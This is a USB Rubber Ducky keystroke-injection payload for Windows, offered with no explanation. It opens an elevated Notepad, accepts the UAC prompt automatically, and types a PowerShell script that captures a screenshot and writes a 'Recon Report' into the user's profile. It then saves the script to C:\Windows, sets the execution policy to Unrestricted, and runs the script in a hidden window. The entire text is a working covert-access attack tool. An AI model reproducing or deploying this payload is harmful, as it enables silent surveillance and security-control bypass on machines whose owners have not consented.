DELAY 1100
GUI r
DELAY 1100
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 1100
ALT y
DELAY 200
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' + $folderDateTime
ENTER
STRING $fileSaveDir = New-Item  ($userDir) -ItemType Directory
ENTER
STRING $date = get-date
ENTER
STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body {padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid black;background-color:white;height:100%;overflow:auto;}#left{float:left; background-color:#C0C0C0;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#right{background-color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid black;padding:10px;margin:10px;overflow:scroll;}#center{background-color:#C0C0C0;width:98%;height:300px;border: 4px solid black;padding:10px;overflow:scroll;margin:10px;} </style>"
ENTER
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style > $fileSaveDir'/ComputerInfo.html'
ENTER
STRING $Report = $Report +"<div id=body><h1>Duck Tool Kit Report</h1><hr size=2><br><h3> Generated on: $Date </h3><br>"
ENTER
STRING $jpegSaveDir = New-Item $fileSaveDir'/Screenshots' -ItemType Directory
ENTER
STRING $displayInfo = Get-WmiObject Win32_DesktopMonitor | Where {$_.Name -eq 'Default Monitor'}| Select ScreenHeight, ScreenWidth
ENTER
STRING $displayWidth = $displayInfo.ScreenWidth
ENTER
STRING $displayHeight = $displayInfo.ScreenHeight
ENTER
STRING [System.Reflection.Assembly]::LoadWithPartialName("System.Drawing")
ENTER
STRING $x = 0
ENTER
STRING do { Start-Sleep -Seconds 60
ENTER
STRING $jpegName = (get-date).ToString('HHmmss')
ENTER
STRING $image = new-object System.Drawing.Bitmap 1366 ,768
ENTER
STRING $imageSize = New-object System.Drawing.Size $displayWidth,$displayHeight
ENTER
STRING $screen = [System.Drawing.Graphics]::FromImage($image)
ENTER
STRING $screen.copyfromscreen(0,0,0,0, $imageSize,([System.Drawing.CopyPixelOperation]::SourceCopy))
ENTER
STRING $image.Save("$jpegSaveDir/$jpegName.jpeg",([system.drawing.imaging.imageformat]::jpeg));
ENTER
STRING $x++  } while ($x -ne 1);
ENTER
STRING $Report >> $fileSaveDir'/ComputerInfo.html'
CTRL S
DELAY  1100
STRING C:\Windows\ducky.ps1
ENTER
DELAY 1100
ALT F4
DELAY 1100
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 1100
ALT y
DELAY 200
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:$false
ENTER
DELAY 1100
STRING powershell.exe -windowstyle hidden -File C:\Windows\ducky.ps1
ENTER